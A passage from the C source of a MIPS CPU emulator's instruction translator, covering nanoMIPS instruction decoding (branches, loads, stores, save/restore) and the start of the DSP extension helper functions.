8 : count; while (counter != count) { int this_rt = ((rt + counter) & 0x1f) | (rt & 0x10); int this_offset = offset + (counter << 2); gen_base_offset_addr(ctx, va, rs, this_offset); switch (extract32(ctx->opcode, 11, 1)) { case NM_LWM: tcg_gen_qemu_ld_tl(tcg_ctx, t1, va, ctx->mem_idx, memop | MO_TESL); gen_store_gpr(tcg_ctx, t1, this_rt); if ((this_rt == rs) && (counter != (count - 1))) { /* UNPREDICTABLE */ } break; case NM_SWM: this_rt = (rt == 0) ? 0 : this_rt; gen_load_gpr(tcg_ctx, t1, this_rt); tcg_gen_qemu_st_tl(tcg_ctx, t1, va, ctx->mem_idx, memop | MO_TEUL); break; } counter++; } tcg_temp_free(tcg_ctx, va); tcg_temp_free(tcg_ctx, t1); } break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_MOVE_BALC: check_nms(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); int32_t s = sextract32(ctx->opcode, 0, 1) << 21 | extract32(ctx->opcode, 1, 20) << 1; rd = (extract32(ctx->opcode, 24, 1)) == 0 ? 4 : 5; rt = decode_gpr_gpr4_zero(extract32(ctx->opcode, 25, 1) << 3 | extract32(ctx->opcode, 21, 3)); gen_load_gpr(tcg_ctx, t0, rt); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); gen_compute_branch_nm(ctx, OPC_BGEZAL, 4, 0, 0, s); tcg_temp_free(tcg_ctx, t0); } break; case NM_P_BAL: { int32_t s = sextract32(ctx->opcode, 0, 1) << 25 | extract32(ctx->opcode, 1, 24) << 1; if ((extract32(ctx->opcode, 25, 1)) == 0) { /* BC */ gen_compute_branch_nm(ctx, OPC_BEQ, 4, 0, 0, s); } else { /* BALC */ gen_compute_branch_nm(ctx, OPC_BGEZAL, 4, 0, 0, s); } } break; case NM_P_J: switch (extract32(ctx->opcode, 12, 4)) { case NM_JALRC: case NM_JALRC_HB: gen_compute_branch_nm(ctx, OPC_JALR, 4, rs, rt, 0); break; case NM_P_BALRSC: gen_compute_nanomips_pbalrsc_branch(ctx, rs, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_BR1: { int32_t s = sextract32(ctx->opcode, 0, 1) << 14 | extract32(ctx->opcode, 1, 13) << 1; switch (extract32(ctx->opcode, 14, 2)) { case NM_BEQC: check_nms(ctx); gen_compute_branch_nm(ctx, OPC_BEQ, 4, rs, rt, s); break; case NM_P_BR3A: s = sextract32(ctx->opcode, 0, 1) << 14 | extract32(ctx->opcode, 1, 13) << 1; check_cp1_enabled(ctx); switch (extract32(ctx->opcode, 16, 5)) { case NM_BC1EQZC: gen_compute_branch_cp1_nm(ctx, OPC_BC1EQZ, rt, s); break; case NM_BC1NEZC: gen_compute_branch_cp1_nm(ctx, OPC_BC1NEZ, rt, s); break; case NM_BPOSGE32C: check_dsp_r3(ctx); { int32_t imm = extract32(ctx->opcode, 1, 13) | extract32(ctx->opcode, 0, 1) << 13; gen_compute_branch_nm(ctx, OPC_BPOSGE32, 4, -1, -2, imm); } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_BGEC: if (rs == rt) { gen_compute_compact_branch_nm(ctx, OPC_BC, rs, rt, s); } else { gen_compute_compact_branch_nm(ctx, OPC_BGEC, rs, rt, s); } break; case NM_BGEUC: if (rs == rt || rt == 0) { gen_compute_compact_branch_nm(ctx, OPC_BC, 0, 0, s); } else if (rs == 0) { gen_compute_compact_branch_nm(ctx, OPC_BEQZC, rt, 0, s); } else { gen_compute_compact_branch_nm(ctx, OPC_BGEUC, rs, rt, s); } break; } } break; case NM_P_BR2: { int32_t s = sextract32(ctx->opcode, 0, 1) << 14 | extract32(ctx->opcode, 1, 13) << 1; switch (extract32(ctx->opcode, 14, 2)) { case NM_BNEC: check_nms(ctx); gen_compute_branch_nm(ctx, OPC_BNE, 4, rs, rt, s); break; case NM_BLTC: if (rs != 0 && rt != 0 && rs == rt) { /* NOP */ ctx->hflags |= MIPS_HFLAG_FBNSLOT; } else { gen_compute_compact_branch_nm(ctx, OPC_BLTC, rs, rt, s); } break; case NM_BLTUC: if (rs == 0 || rs == rt) { /* NOP */ ctx->hflags |= MIPS_HFLAG_FBNSLOT; } else { gen_compute_compact_branch_nm(ctx, OPC_BLTUC, rs, rt, s); } break; 
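            /*
             * Any other minor opcode in the P.BR2 pool is reserved and
             * raises a Reserved Instruction exception below.
             */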
default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_P_BRI: { int32_t s = sextract32(ctx->opcode, 0, 1) << 11 | extract32(ctx->opcode, 1, 10) << 1; uint32_t u = extract32(ctx->opcode, 11, 7); gen_compute_imm_branch(ctx, extract32(ctx->opcode, 18, 3), rt, u, s); } break; default: generate_exception_end(ctx, EXCP_RI); break; } return 4; } static int decode_nanomips_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op; int rt = decode_gpr_gpr3(NANOMIPS_EXTRACT_RT3(ctx->opcode)); int rs = decode_gpr_gpr3(NANOMIPS_EXTRACT_RS3(ctx->opcode)); int rd = decode_gpr_gpr3(NANOMIPS_EXTRACT_RD3(ctx->opcode)); int offset; int imm; /* make sure instructions are on a halfword boundary */ if (ctx->base.pc_next & 0x1) { TCGv tmp = tcg_const_tl(tcg_ctx, ctx->base.pc_next); tcg_gen_st_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); tcg_temp_free(tcg_ctx, tmp); generate_exception_end(ctx, EXCP_AdEL); return 2; } op = extract32(ctx->opcode, 10, 6); switch (op) { case NM_P16_MV: rt = NANOMIPS_EXTRACT_RD5(ctx->opcode); if (rt != 0) { /* MOVE */ rs = NANOMIPS_EXTRACT_RS5(ctx->opcode); gen_arith(ctx, OPC_ADDU, rt, rs, 0); } else { /* P16.RI */ switch (extract32(ctx->opcode, 3, 2)) { case NM_P16_SYSCALL: if (extract32(ctx->opcode, 2, 1) == 0) { generate_exception_end(ctx, EXCP_SYSCALL); } else { generate_exception_end(ctx, EXCP_RI); } break; case NM_BREAK16: generate_exception_end(ctx, EXCP_BREAK); break; case NM_SDBBP16: if (is_uhi(extract32(ctx->opcode, 0, 3))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception_end(ctx, EXCP_RI); } else { generate_exception_end(ctx, EXCP_DBp); } } break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_P16_SHIFT: { int shift = extract32(ctx->opcode, 0, 3); uint32_t opc = 0; shift = (shift == 0) ? 8 : shift; switch (extract32(ctx->opcode, 3, 1)) { case NM_SLL16: opc = OPC_SLL; break; case NM_SRL16: opc = OPC_SRL; break; } gen_shift_imm(ctx, opc, rt, rs, shift); } break; case NM_P16C: switch (ctx->opcode & 1) { case NM_POOL16C_0: gen_pool16c_nanomips_insn(ctx); break; case NM_LWXS16: gen_ldxs(ctx, rt, rs, rd); break; } break; case NM_P16_A1: switch (extract32(ctx->opcode, 6, 1)) { case NM_ADDIUR1SP: imm = extract32(ctx->opcode, 0, 6) << 2; gen_arith_imm(ctx, OPC_ADDIU, rt, 29, imm); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P16_A2: switch (extract32(ctx->opcode, 3, 1)) { case NM_ADDIUR2: imm = extract32(ctx->opcode, 0, 3) << 2; gen_arith_imm(ctx, OPC_ADDIU, rt, rs, imm); break; case NM_P_ADDIURS5: rt = extract32(ctx->opcode, 5, 5); if (rt != 0) { /* imm = sign_extend(s[3] . 
s[2:0] , from_nbits = 4) */ imm = (sextract32(ctx->opcode, 4, 1) << 3) | (extract32(ctx->opcode, 0, 3)); gen_arith_imm(ctx, OPC_ADDIU, rt, rt, imm); } break; } break; case NM_P16_ADDU: switch (ctx->opcode & 0x1) { case NM_ADDU16: gen_arith(ctx, OPC_ADDU, rd, rs, rt); break; case NM_SUBU16: gen_arith(ctx, OPC_SUBU, rd, rs, rt); break; } break; case NM_P16_4X4: rt = (extract32(ctx->opcode, 9, 1) << 3) | extract32(ctx->opcode, 5, 3); rs = (extract32(ctx->opcode, 4, 1) << 3) | extract32(ctx->opcode, 0, 3); rt = decode_gpr_gpr4(rt); rs = decode_gpr_gpr4(rs); switch ((extract32(ctx->opcode, 7, 2) & 0x2) | (extract32(ctx->opcode, 3, 1))) { case NM_ADDU4X4: check_nms(ctx); gen_arith(ctx, OPC_ADDU, rt, rs, rt); break; case NM_MUL4X4: check_nms(ctx); gen_r6_muldiv(ctx, R6_OPC_MUL, rt, rs, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_LI16: { int imm = extract32(ctx->opcode, 0, 7); imm = (imm == 0x7f ? -1 : imm); if (rt != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], imm); } } break; case NM_ANDI16: { uint32_t u = extract32(ctx->opcode, 0, 4); u = (u == 12) ? 0xff : (u == 13) ? 0xffff : u; gen_logic_imm(ctx, OPC_ANDI, rt, rs, u); } break; case NM_P16_LB: offset = extract32(ctx->opcode, 0, 2); switch (extract32(ctx->opcode, 2, 2)) { case NM_LB16: gen_ld(ctx, OPC_LB, rt, rs, offset); break; case NM_SB16: rt = decode_gpr_gpr3_src_store( NANOMIPS_EXTRACT_RT3(ctx->opcode)); gen_st(ctx, OPC_SB, rt, rs, offset); break; case NM_LBU16: gen_ld(ctx, OPC_LBU, rt, rs, offset); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P16_LH: offset = extract32(ctx->opcode, 1, 2) << 1; switch ((extract32(ctx->opcode, 3, 1) << 1) | (ctx->opcode & 1)) { case NM_LH16: gen_ld(ctx, OPC_LH, rt, rs, offset); break; case NM_SH16: rt = decode_gpr_gpr3_src_store( NANOMIPS_EXTRACT_RT3(ctx->opcode)); gen_st(ctx, OPC_SH, rt, rs, offset); break; case NM_LHU16: gen_ld(ctx, OPC_LHU, rt, rs, offset); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_LW16: offset = extract32(ctx->opcode, 0, 4) << 2; gen_ld(ctx, OPC_LW, rt, rs, offset); break; case NM_LWSP16: rt = NANOMIPS_EXTRACT_RD5(ctx->opcode); offset = extract32(ctx->opcode, 0, 5) << 2; gen_ld(ctx, OPC_LW, rt, 29, offset); break; case NM_LW4X4: check_nms(ctx); rt = (extract32(ctx->opcode, 9, 1) << 3) | extract32(ctx->opcode, 5, 3); rs = (extract32(ctx->opcode, 4, 1) << 3) | extract32(ctx->opcode, 0, 3); offset = (extract32(ctx->opcode, 3, 1) << 3) | (extract32(ctx->opcode, 8, 1) << 2); rt = decode_gpr_gpr4(rt); rs = decode_gpr_gpr4(rs); gen_ld(ctx, OPC_LW, rt, rs, offset); break; case NM_SW4X4: check_nms(ctx); rt = (extract32(ctx->opcode, 9, 1) << 3) | extract32(ctx->opcode, 5, 3); rs = (extract32(ctx->opcode, 4, 1) << 3) | extract32(ctx->opcode, 0, 3); offset = (extract32(ctx->opcode, 3, 1) << 3) | (extract32(ctx->opcode, 8, 1) << 2); rt = decode_gpr_gpr4_zero(rt); rs = decode_gpr_gpr4(rs); gen_st(ctx, OPC_SW, rt, rs, offset); break; case NM_LWGP16: offset = extract32(ctx->opcode, 0, 7) << 2; gen_ld(ctx, OPC_LW, rt, 28, offset); break; case NM_SWSP16: rt = NANOMIPS_EXTRACT_RD5(ctx->opcode); offset = extract32(ctx->opcode, 0, 5) << 2; gen_st(ctx, OPC_SW, rt, 29, offset); break; case NM_SW16: rt = decode_gpr_gpr3_src_store( NANOMIPS_EXTRACT_RT3(ctx->opcode)); rs = decode_gpr_gpr3(NANOMIPS_EXTRACT_RS3(ctx->opcode)); offset = extract32(ctx->opcode, 0, 4) << 2; gen_st(ctx, OPC_SW, rt, rs, offset); break; case NM_SWGP16: rt = decode_gpr_gpr3_src_store( NANOMIPS_EXTRACT_RT3(ctx->opcode)); 
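        /*
         * SWGP16: gp-relative store word; the 7-bit immediate below is
         * scaled by 4 and the base register is fixed to $28 (gp).
         */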
offset = extract32(ctx->opcode, 0, 7) << 2; gen_st(ctx, OPC_SW, rt, 28, offset); break; case NM_BC16: gen_compute_branch_nm(ctx, OPC_BEQ, 2, 0, 0, (sextract32(ctx->opcode, 0, 1) << 10) | (extract32(ctx->opcode, 1, 9) << 1)); break; case NM_BALC16: gen_compute_branch_nm(ctx, OPC_BGEZAL, 2, 0, 0, (sextract32(ctx->opcode, 0, 1) << 10) | (extract32(ctx->opcode, 1, 9) << 1)); break; case NM_BEQZC16: gen_compute_branch_nm(ctx, OPC_BEQ, 2, rt, 0, (sextract32(ctx->opcode, 0, 1) << 7) | (extract32(ctx->opcode, 1, 6) << 1)); break; case NM_BNEZC16: gen_compute_branch_nm(ctx, OPC_BNE, 2, rt, 0, (sextract32(ctx->opcode, 0, 1) << 7) | (extract32(ctx->opcode, 1, 6) << 1)); break; case NM_P16_BR: switch (ctx->opcode & 0xf) { case 0: /* P16.JRC */ switch (extract32(ctx->opcode, 4, 1)) { case NM_JRC: gen_compute_branch_nm(ctx, OPC_JR, 2, extract32(ctx->opcode, 5, 5), 0, 0); break; case NM_JALRC16: gen_compute_branch_nm(ctx, OPC_JALR, 2, extract32(ctx->opcode, 5, 5), 31, 0); break; } break; default: { /* P16.BRI */ uint32_t opc = extract32(ctx->opcode, 4, 3) < extract32(ctx->opcode, 7, 3) ? OPC_BEQ : OPC_BNE; gen_compute_branch_nm(ctx, opc, 2, rs, rt, extract32(ctx->opcode, 0, 4) << 1); } break; } break; case NM_P16_SR: { int count = extract32(ctx->opcode, 0, 4); int u = extract32(ctx->opcode, 4, 4) << 4; rt = 30 + extract32(ctx->opcode, 9, 1); switch (extract32(ctx->opcode, 8, 1)) { case NM_SAVE16: gen_save(ctx, rt, count, 0, u); break; case NM_RESTORE_JRC16: gen_restore(ctx, rt, count, 0, u); gen_compute_branch_nm(ctx, OPC_JR, 2, 31, 0, 0); break; } } break; case NM_MOVEP: case NM_MOVEPREV: check_nms(ctx); { static const int gpr2reg1[] = {4, 5, 6, 7}; static const int gpr2reg2[] = {5, 6, 7, 8}; int re; int rd2 = extract32(ctx->opcode, 3, 1) << 1 | extract32(ctx->opcode, 8, 1); int r1 = gpr2reg1[rd2]; int r2 = gpr2reg2[rd2]; int r3 = extract32(ctx->opcode, 4, 1) << 3 | extract32(ctx->opcode, 0, 3); int r4 = extract32(ctx->opcode, 9, 1) << 3 | extract32(ctx->opcode, 5, 3); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); if (op == NM_MOVEP) { rd = r1; re = r2; rs = decode_gpr_gpr4_zero(r3); rt = decode_gpr_gpr4_zero(r4); } else { rd = decode_gpr_gpr4(r3); re = decode_gpr_gpr4(r4); rs = r1; rt = r2; } gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[re], t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; default: return decode_nanomips_32_48_opc(env, ctx); } return 2; } /* SmartMIPS extension to MIPS32 */ #if defined(TARGET_MIPS64) /* MDMX extension to MIPS64 */ #endif /* MIPSDSP functions. 
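 *
 * The gen_mipsdsp_* helpers below emit TCG ops for the MIPS DSP ASE:
 * indexed loads, arithmetic, shifts, multiply/accumulate, bit
 * instructions, compare/pick, append and accumulator access. Encodings
 * are guarded by check_dsp()/check_dsp_r2(), and register-writing forms
 * treat a $0 destination as a NOP since $0 is hardwired to zero.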
*/ static void gen_mipsdsp_ld(DisasContext *ctx, uint32_t opc, int rd, int base, int offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; check_dsp(ctx); t0 = tcg_temp_new(tcg_ctx); if (base == 0) { gen_load_gpr(tcg_ctx, t0, offset); } else if (offset == 0) { gen_load_gpr(tcg_ctx, t0, base); } else { gen_op_addr_add(ctx, t0, tcg_ctx->cpu_gpr[base], tcg_ctx->cpu_gpr[offset]); } switch (opc) { case OPC_LBUX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_UB); gen_store_gpr(tcg_ctx, t0, rd); break; case OPC_LHX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESW); gen_store_gpr(tcg_ctx, t0, rd); break; case OPC_LWX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t0, rd); break; #if defined(TARGET_MIPS64) case OPC_LDX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TEQ); gen_store_gpr(tcg_ctx, t0, rd); break; #endif } tcg_temp_free(tcg_ctx, t0); } static void gen_mipsdsp_arith(DisasContext *ctx, uint32_t op1, uint32_t op2, int ret, int v1, int v2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv v1_t; TCGv v2_t; if (ret == 0) { /* Treat as NOP. */ return; } v1_t = tcg_temp_new(tcg_ctx); v2_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v1_t, v1); gen_load_gpr(tcg_ctx, v2_t, v2); switch (op1) { /* OPC_MULT_G_2E is equal OPC_ADDUH_QB_DSP */ case OPC_MULT_G_2E: check_dsp_r2(ctx); switch (op2) { case OPC_ADDUH_QB: gen_helper_adduh_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDUH_R_QB: gen_helper_adduh_r_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQH_PH: gen_helper_addqh_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQH_R_PH: gen_helper_addqh_r_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQH_W: gen_helper_addqh_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_ADDQH_R_W: gen_helper_addqh_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBUH_QB: gen_helper_subuh_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBUH_R_QB: gen_helper_subuh_r_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBQH_PH: gen_helper_subqh_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBQH_R_PH: gen_helper_subqh_r_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBQH_W: gen_helper_subqh_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_SUBQH_R_W: gen_helper_subqh_r_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; } break; case OPC_ABSQ_S_PH_DSP: switch (op2) { case OPC_ABSQ_S_QB: check_dsp_r2(ctx); gen_helper_absq_s_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_ABSQ_S_PH: check_dsp(ctx); gen_helper_absq_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_ABSQ_S_W: check_dsp(ctx); gen_helper_absq_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_PRECEQ_W_PHL: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, 0xFFFF0000); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); break; case OPC_PRECEQ_W_PHR: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, 0x0000FFFF); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], 16); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); break; case OPC_PRECEQU_PH_QBL: check_dsp(ctx); gen_helper_precequ_ph_qbl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_PH_QBR: check_dsp(ctx); gen_helper_precequ_ph_qbr(tcg_ctx, tcg_ctx->cpu_gpr[ret], 
v2_t); break; case OPC_PRECEQU_PH_QBLA: check_dsp(ctx); gen_helper_precequ_ph_qbla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_PH_QBRA: check_dsp(ctx); gen_helper_precequ_ph_qbra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_PH_QBL: check_dsp(ctx); gen_helper_preceu_ph_qbl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_PH_QBR: check_dsp(ctx); gen_helper_preceu_ph_qbr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_PH_QBLA: check_dsp(ctx); gen_helper_preceu_ph_qbla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_PH_QBRA: check_dsp(ctx); gen_helper_preceu_ph_qbra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; } break; case OPC_ADDU_QB_DSP: switch (op2) { case OPC_ADDQ_PH: check_dsp(ctx); gen_helper_addq_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_S_PH: check_dsp(ctx); gen_helper_addq_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDQ_S_W: check_dsp(ctx); gen_helper_addq_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_QB: check_dsp(ctx); gen_helper_addu_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_S_QB: check_dsp(ctx); gen_helper_addu_s_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_PH: check_dsp_r2(ctx); gen_helper_addu_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDU_S_PH: check_dsp_r2(ctx); gen_helper_addu_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_PH: check_dsp(ctx); gen_helper_subq_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_S_PH: check_dsp(ctx); gen_helper_subq_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBQ_S_W: check_dsp(ctx); gen_helper_subq_s_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_QB: check_dsp(ctx); gen_helper_subu_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_S_QB: check_dsp(ctx); gen_helper_subu_s_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_PH: check_dsp_r2(ctx); gen_helper_subu_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_SUBU_S_PH: check_dsp_r2(ctx); gen_helper_subu_s_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDSC: check_dsp(ctx); gen_helper_addsc(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_ADDWC: check_dsp(ctx); gen_helper_addwc(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_MODSUB: check_dsp(ctx); gen_helper_modsub(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_RADDU_W_QB: check_dsp(ctx); gen_helper_raddu_w_qb(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t); break; } break; case OPC_CMPU_EQ_QB_DSP: switch (op2) { case OPC_PRECR_QB_PH: check_dsp_r2(ctx); gen_helper_precr_qb_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_QB_PH: check_dsp(ctx); gen_helper_precrq_qb_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECR_SRA_PH_W: check_dsp_r2(ctx); { TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, v2); gen_helper_precr_sra_ph_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], sa_t, v1_t, tcg_ctx->cpu_gpr[ret]); tcg_temp_free_i32(tcg_ctx, sa_t); break; } case OPC_PRECR_SRA_R_PH_W: check_dsp_r2(ctx); { TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, v2); 
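                /*
                 * Here v2 encodes the shift amount rather than a register
                 * index, and cpu_gpr[ret] is passed to the helper as both
                 * an input operand and the destination.
                 */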
gen_helper_precr_sra_r_ph_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], sa_t, v1_t, tcg_ctx->cpu_gpr[ret]); tcg_temp_free_i32(tcg_ctx, sa_t); break; } case OPC_PRECRQ_PH_W: check_dsp(ctx); gen_helper_precrq_ph_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t); break; case OPC_PRECRQ_RS_PH_W: check_dsp(ctx); gen_helper_precrq_rs_ph_w(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; case OPC_PRECRQU_S_QB_PH: check_dsp(ctx); gen_helper_precrqu_s_qb_ph(tcg_ctx, tcg_ctx->cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); break; } break; #ifdef TARGET_MIPS64 case OPC_ABSQ_S_QH_DSP: switch (op2) { case OPC_PRECEQ_L_PWL: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, 0xFFFFFFFF00000000ull); break; case OPC_PRECEQ_L_PWR: check_dsp(ctx); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, 32); break; case OPC_PRECEQ_PW_QHL: check_dsp(ctx); gen_helper_preceq_pw_qhl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQ_PW_QHR: check_dsp(ctx); gen_helper_preceq_pw_qhr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQ_PW_QHLA: check_dsp(ctx); gen_helper_preceq_pw_qhla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQ_PW_QHRA: check_dsp(ctx); gen_helper_preceq_pw_qhra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_QH_OBL: check_dsp(ctx); gen_helper_precequ_qh_obl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_QH_OBR: check_dsp(ctx); gen_helper_precequ_qh_obr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_QH_OBLA: check_dsp(ctx); gen_helper_precequ_qh_obla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEQU_QH_OBRA: check_dsp(ctx); gen_helper_precequ_qh_obra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_QH_OBL: check_dsp(ctx); gen_helper_preceu_qh_obl(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_QH_OBR: check_dsp(ctx); gen_helper_preceu_qh_obr(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_QH_OBLA: check_dsp(ctx); gen_helper_preceu_qh_obla(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_PRECEU_QH_OBRA: check_dsp(ctx); gen_helper_preceu_qh_obra(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t); break; case OPC_ABSQ_S_OB: check_dsp_r2(ctx); gen_helper_absq_s_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_ABSQ_S_PW: check_dsp(ctx); gen_helper_absq_s_pw(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; case OPC_ABSQ_S_QH: check_dsp(ctx); gen_helper_absq_s_qh(tcg_ctx, tcg_ctx->cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); break; } break; case OPC_ADDU_OB_DSP: switch (op2) { case OPC_RADDU_L_OB: check_dsp(ctx); gen_helper_raddu_l_ob(tcg_ctx, tcg_ctx->cpu_gpr[ret], 